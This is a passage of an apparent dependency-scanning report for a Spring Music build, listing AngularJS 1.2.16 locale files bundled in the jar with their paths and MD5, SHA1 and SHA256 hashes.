spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-ph.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-ph.jsMD5: 3e696542084731465800ba8727938755SHA1: a4812db4fb080cfac3cd6e9b7474249e6774800bSHA256: e85388448447ed28ed98e6f2dd50251d74f3c9cd1ebb9e1fe0d409e7adc5e83b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pk.jsMD5: f59b73693a6f4a835bb5872d66d34a95SHA1: 674f817f7906ad6371145061f2f32d8500f2975fSHA256: 106cdbaa6552f81965ee6aadc8e4d0663fe3fd18e5a35afff8d5b47398a4e791
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pr.jsMD5: 6d60893826710934e6135147c3d422fcSHA1: 5816175c3e619b7376091843af776b8948e08a41SHA256: 825bd81a92ae2d5060c42a1f87330a53006841f26858a2d955b8c7bdff83f664
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-pw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-pw.jsMD5: 9cbcc24cbfd74cf3a615d51785b10a73SHA1: 566470335d37fb6953ace38fe1a40c7a247291baSHA256: ac8ba315c51412c95fe7f5bde1640b41580587f1641a36fbca2db0e07763da8a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-sg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-sg.jsMD5: 46133dd09f4ae82ec71ad4d19918ab37SHA1: acca539dd5f6fe2188dc599f76ec14b215ed92b4SHA256: 9bc6196b4628c218ae9e7b167f510e5c7fd19bb97debad8c334ce5a787092c67
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-tc.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-tc.jsMD5: 137388e786886100b831e98be115f994SHA1: d763c6dfa9a9bc70042a9db61aa12544759f2b28SHA256: 1d45d5b24ecbe90d4137fbf62347eaea22cea1d2a638acc8115007160d22fb96
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-tt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-tt.jsMD5: c020c852340c814b4c5a7aa5375ea9d3SHA1: e33d75cdc5831ec82cb937955cac13a9a32b5ba8SHA256: 4c26ac60aa0695985554451201021fe3d75783e04272c83dabda1a15b8b9abc0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-um.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-um.jsMD5: 6d0bb60d5ec663f897abf15ef5b6ba08SHA1: 80aef25d64a57b8e7f47db954eb4695a0d3a5c04SHA256: 0966384007729b76ae1ec61ccb039c33294bcefdf1403c18687379b60425d7a2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-us.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-us.jsMD5: 40959785e2ddac2956e6c5a2efd9c6beSHA1: 1fc78655ea8516ec5f9bb8d5ef18b09b1eddfaa0SHA256: de119499a7466aa627fe79bb1568082843747ad25e79c9814521c5117091e3c5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-vg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-vg.jsMD5: f6ec14bd4d1d9fe668c7f1153f772fd3SHA1: 41ba85592d069e544ceab29a87a20a2dc7f5c6b9SHA256: 7cd70d909ebd4e0ddad9d940bd3242f7aa8b148b842f178adbc9d0951697f30b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-vi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-vi.jsMD5: 1cad652eaca2d1226fda562be41cbdaaSHA1: d495dc75edeb06b3142e10213a0fe92883752483SHA256: 7120e5bdfa4b5d11a40c47fd04f88f2d0cb73919d4464b75321483d0a4ccad2c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-za.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-za.jsMD5: e10f8840635b50da81ca71b88e9a09d6SHA1: 3b3643485db446e4d56488f633fb6960866c1739SHA256: 5658111f304a4efc95fda0ee88a8f068317d5ad68d305a08ca1c475dadad7a53
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-zw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-zw.jsMD5: aa6384e7296dfea51d33511c301904f9SHA1: ad34b7837067f6ced580177e58ebbe7ebd6cdcaeSHA256: dde6100a49704a9f5d2dbb4fb7b412a09a0283447fb2f25c257d961867f352e1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en.jsMD5: df6fce84d373c1e539ef1f3cc08ec0d1SHA1: e67963582996097fdea1ed2e85785d7a5f92b86fSHA256: 1f8c92716b9b9a7998ec913fabf8f99eb73f483900cba28b89abe073771e8bb8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-419.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-419.jsMD5: c3dcc66d0575931380333e2643a46efdSHA1: 8c3f3d5b64dcd12a3d6b3851969a4d7cfd06caa4SHA256: db121135623fd01a0d4087ac303f0e7c2f8b4d71a15bc28cb08bb6bac86c79ec
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ar.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ar.jsMD5: d5801b41cecfb4af0636a2c10deab608SHA1: db764e7ae6eb98a0452ea6394b5395d7b3dbc5e7SHA256: 5147e6636984e028050fcef7bf5b979da46ce77b3252f21c48a46697bedec85a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-bo.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-bo.jsMD5: e4547d89cecbc912427acdd30e142b00SHA1: d91ac80324db37283f7e821fdacf550d34a727f4SHA256: b348e84780cd263ed42e3eed7b01e7ad0bf7fbbde4f38f89ffaa77b97d4c82b5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-cl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-cl.jsMD5: f3597d311953675e6afcb417753fc651SHA1: cacb03a818b443af59b5f6fd95560dfa3ba0c1a9SHA256: 6a0ec67524f39d6032c106297d701b9185221903a65b7a7342b4a89c5ff4b9d0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-co.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-co.jsMD5: 152b3b4982f4ee6e28d9abdd51e61fcdSHA1: 5522355792b41155f9a03e0b49cfd12dcde6592fSHA256: 001262fa01caa953655a6d2f86f0fbcb3e0ce545837c8e5781ce8c5dafd9e4c9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-cr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-cr.jsMD5: 61145cb67e0cf78495acbbf1fc3c66d2SHA1: 411c1531e150c7ff8fe181a870e48aac29e5c583SHA256: 19cdf4de3349d99250442b63b89d872eee2280b61e5cf339a0c76a4a842edc7c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-do.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-do.jsMD5: 62a59b6bfaa2a11446081d45a090e8d4SHA1: c017a4afba708584c8280fac8bf954518f911f06SHA256: 979a70922762637ec262c40bef213aafc9e6129bc69390626101ef99a33600cc
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ea.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ea.jsMD5: 8085210a1fd3e82a7eed841525f5e790SHA1: 464ccba22204517250f5c5ffaa6e1a43826bdd53SHA256: dc20f0579509adff218a76b786b3a8143b9b049a89eeb7923e9d97659525362d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ec.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ec.jsMD5: 5632f0491339142aaf4a7f681fdeeeb4SHA1: fcb7ff849a4f915d8146d7fd62fb7ba7574c9a56SHA256: 13c417604e631240c33976ecde4de75526ac79b8dea177bef1e517b47a4903d8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-es.jsMD5: 052b3894b22399d64a048a786afd9ba8SHA1: b1713f22b257eb7f47e03388069206cae5c65541SHA256: a6914f29417fd00ddb99d5459515e101d7045d25b34ac255cb959968889abdbf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-gq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-gq.jsMD5: be2c2108c86eab7d6a73444503e17835SHA1: 86c22283052011ccec757422741bfdfc60f076aaSHA256: 897f1ce4a2db227c00e04ba192b69a9c609c62ddfe05a62acf6517ea5df43045
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-gt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-gt.jsMD5: 855a32a559e3ed68914fa6d7e40c5121SHA1: cb395e59534ad90320d3e3788bb294eb92640061SHA256: f1f7d4cc2fbc3b12b483017e37047680a901a85a0394236eaa3edbd315499eca
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-hn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-hn.jsMD5: 1ef359216b3591ec94b84114c5313beeSHA1: 6eeb3795f1b5c57e53fddfcbf7903dbc01b69d6bSHA256: be4f825284484e29b6513016a3df00c19a30f855d0c813037a13b71b99d282fa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ic.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ic.jsMD5: 737dc27638c150006d35cec479de1471SHA1: 32bb529dec19b6a51224f1fb0d94f72b07e8a422SHA256: f8ecf73e78a4dd2b0717b0c33186726365a9664566835085aa1d08eafc0afcf7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-mx.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-mx.jsMD5: e0ba9c887e69c12c78dfbc4028cdd365SHA1: ffd6d822ed3360c93d253844c5434dd4444a1f50SHA256: 514640b489606e420c1a51abb73e16891397254786c2d2bdb85b499fbfa45e88
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ni.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ni.jsMD5: 4ad641bcfd11a4dbe2f0a97c3d43306cSHA1: deec07091ac72346b5f9442934c166485587e2dbSHA256: 3cf5fa668341cc91024883db32fb6a44773338f4ee7911960968e05366b1b5ad
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pa.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pa.jsMD5: c16a8c3f0e67d2f14bc8b8d2b252b4fbSHA1: 2e62dd921101c71dd5ad789ffcc7246fee39f21eSHA256: b908ec0a0bce1b7c91a8eb8b17e4d908ea1b40b8b9ea15b5d127554d6ea5b334
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pe.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pe.jsMD5: 2969d9c11a1921e5a82d47e75db342d6SHA1: 828aff68c4b56eada62741ffeacb1db455692098SHA256: 46b20ce6a9faa5b2f0a61886e9df6ca203cf021d2783f79037c9d07242eda968
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-pr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-pr.jsMD5: 2088728a280fa9be45209639bbfc56deSHA1: 394b30b14c1a031185808ce0a76aa293ea398436SHA256: c909a467a205e68288d25a1c1d75313318413f614d9c8b1c7e4eaad6a2605ae4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-py.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-py.jsMD5: 7922d3fe23df4ab9dcea868567ef47ceSHA1: 305696960a55bef504e829208216db90a9b8088dSHA256: 416660781d50ed7a2f8963cbbb19400e40eb6a8269200dc795e61f85d1e5a8fa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-sv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-sv.jsMD5: e20105ff10a0e519ef84515d11368970SHA1: f495fa3f8e190bf3fbfb95c5b8307843c4452581SHA256: a47a8c250314704f5d08ba643b5ba307400f8a4c3743ba6285f079699c87f0a8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-us.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-us.jsMD5: 3a8cb7700af81aa8d303bff55cb151d1SHA1: 56c15677a4ff978a1c9fa4c45da7bf88e8d71560SHA256: 60be8483bda3b225c454c832f54d34112dd0f2ad079d7a013818154c5cb98fef
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-uy.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-uy.jsMD5: 38ecf120ffc1519648199c00538fa609SHA1: ffb4d2b8b94a02159310a39940a5936128f49904SHA256: 20144c3aa8748387595512443fe2361db3973c27bb9470128ebfa565b872f363
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es-ve.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es-ve.jsMD5: 66da69e7f833a8658db9e8be78bc08c5SHA1: 84100e53fd55796988d3ba0188a1ce111bc532c7SHA256: d3000fe744ff95e2e9ed6a60bca15e1421e1031414f7217d908b69e9295c87fc
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_es.jsMD5: c89bf8d1dc408d95e985094f07ded6c7SHA1: cddca3b6a23d0dbb20d0741ebc88b83043ccbfd5SHA256: e435a3e0d6ea206c03e7a842915304ea649e1c50a44a905f2f8a40b6b429e83b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_et-ee.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_et-ee.jsMD5: 8141fdd626dac0eb8237b5770fcacdf8SHA1: 36c21d7ed72ee7af900b78eee414ef267a55795dSHA256: 3b5a750e04ec4d8705efaa526917be5643825a8ea4888ba63b99f2bde8c2fa92
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_et.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_et.jsMD5: 4cb455f2ff2a08c95c99912b2d764d11SHA1: 635b7d38d0e8e795a0c2912346d5bf2be446df51SHA256: 90241eb442c709b20d749c6ac3d140720c81f085f8788352c8939a0d9fca77c3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_eu-es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_eu-es.jsMD5: b7e002b81810dbd4501c39801b4aea75SHA1: 2ea61d79eb4d34c923cef179bea95ec59955e00cSHA256: ea667bfce65fd20080292f47a9a882f74c3fbfeb771f079bafcb259188cec8a2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_eu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_eu.jsMD5: e2af9ee595d50c8bc3d3da1661883a8dSHA1: ab5c5e784518339fa284f349c660f178bc480efaSHA256: be422e2cff17c3f239577fecd6b9c61f61590f76af95808c546af724ba9c0f90
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa-af.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa-af.jsMD5: 900232a857e5ccae5a8ba66f078338f3SHA1: 976c3f18df486f9dea083e903ed805643c715159SHA256: d7222e46c59a271bf33cee2a82e285b6134e70a6bc627257bf89269732161a33
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa-ir.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa-ir.jsMD5: 605626627b58200cffdf962d48487693SHA1: 91b41e754d5e012a6fcd55994835f3a8228aecb8SHA256: b1ea413529fed167de879f62a39d866373507f9ad5804faf08a16f12830e2a80
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fa.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fa.jsMD5: b28c6e37e5c0c23e59dc426eedb3bbb1SHA1: b0aa3625c9b8e319f1b9ed2867637078ad3c5f04SHA256: 3c36d6b30b63f10f8e5c861f20709711ba1651d0055c05cb9132ba78b87905c1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fi-fi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fi-fi.jsMD5: a4f7b5c02a4890c5d460e1353d2a994bSHA1: 100be9bab6340c3249e35939828c4c33eed69305SHA256: d15be6c4d52831d7f4c20b8f2b461332215072284affcf3ca299ddc2bb812ab0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fi.jsMD5: df81ead8e990d70158cbf5e8bf497fe3SHA1: c67f0bff58c544634262d27e4308ce08160c94a4SHA256: 541b0fab7d7873e985ccdd5495f94909e6fdd828dc17e2ff1ae9a56085b07212
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fil-ph.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fil-ph.jsMD5: 8082c3bfea8464c446fb7a5f6d4e46ceSHA1: 2aa50266d61eea45b974bbf2fd3583a8748a89e0SHA256: dd9c17accdfacd776151cef90fcca884acaeb9080ee524e4f5b6e50bd4a1f0fb
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fil.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fil.jsMD5: 253e9849f229287473c02bbcc7702b28SHA1: ca5d504ce6a15379dba14903bc07d0f52646bfe1SHA256: b76b94481e58e2128fb22b243d6bce294868eb074bfd34cf90a78f21dbfc3d4f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-be.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-be.jsMD5: 8c39aa506dd3bc16bb3553bfe8ee8796SHA1: 68451f142b82c0c92cdade8a1ac36e18e99b528aSHA256: dd5030b015cbb8a8c1590d3fab5a5a18df4bb788b599eda55c5483c691dbfb88
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bf.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bf.jsMD5: 48230bdbe0e65ad0b6cba19ac9f22e47SHA1: 50cc5967d74b2ed0dd523a29922601cb125468f4SHA256: 08786b70e990a71a3116ece19733c256a9c44e7df7cf2e722aa3e69d77e7a37f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bi.jsMD5: 5b0baf8b323d57f2571e1cdca0dfe786SHA1: 94fdae4dce2a264a704fd0e87d6ab682c4c8de48SHA256: 96644c11d620f7df146337877f1a43fb8b18d639573ac76267bc009fc9c683af
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bj.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bj.jsMD5: 4bbaf07de5345d4772388d4cce2a4b8cSHA1: cd68b139086aa3ccf6a1cadc3f94b4b11b882e39SHA256: d4f91f5af125108515a92510c3becac369fcbf553673bea1819c4463a079f878
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-bl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-bl.jsMD5: 4aa8cd86fe773ef39c73c11575bade55SHA1: ec5dc3fbbf731b7c4d12265d3b301adc856bc1a8SHA256: a0b9ea9d906aa0f58514a321f9da01c06ba2d5b6283d875de7e41735be24478c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ca.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ca.jsMD5: a5c88d42d000ea1973dba4766f1a30abSHA1: 7232499350db9ca0732c027083a22bd164c018fcSHA256: bb789cd5aa49662acaab227824a6856894bc55817a97767420373afa78d7d03f
Evidence Type Source Name Value Confidence
